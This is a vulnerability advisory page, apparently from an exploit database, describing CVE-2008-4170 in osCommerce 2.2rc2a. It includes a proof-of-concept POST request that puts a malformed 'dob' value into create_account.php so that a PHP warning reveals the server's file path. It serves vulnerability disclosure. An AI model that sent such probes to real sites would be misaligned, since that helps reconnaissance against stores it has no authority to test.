osCommerce 2.2rc2a - Information Disclosure

2008-09-23 / 2008-09-24
Credit: John Cobb
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-4170
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Application: osCommerce 2.2rc2a Authors Site: http://www.oscommerce.com/ +--------------------------------------------------------------+ Information Disclosure: Manipulation of the 'DOB' Variable on create_account.php can cause information disclosure: In this example the POST variable 'DOB' has been set to: FOOBAR POST /oscommerce/create_account.php action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_a ddre ss=email (at) address (dot) com [email concealed]&company=foobar&street_address=foobar&suburb=foobar& post code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax= 1234 56789&newsletter=on&password=foobar&confirmation=foobar Result: Warning: checkdate() expects parameter 3 to be long, string given in /var/www/oscommerce/create_account.php on line 80 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 05/09/2008 Author(s) Informed on: 06/09/2008 Author(s) Response: None Yet Author(s) Fix: None Yet JohnC (at) NoBytes (dot) com [email concealed] http://www.NoBytes.com

References:

http://xforce.iss.net/xforce/xfdb/45193
http://www.securityfocus.com/bid/31209
http://www.securityfocus.com/archive/1/archive/1/496417/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top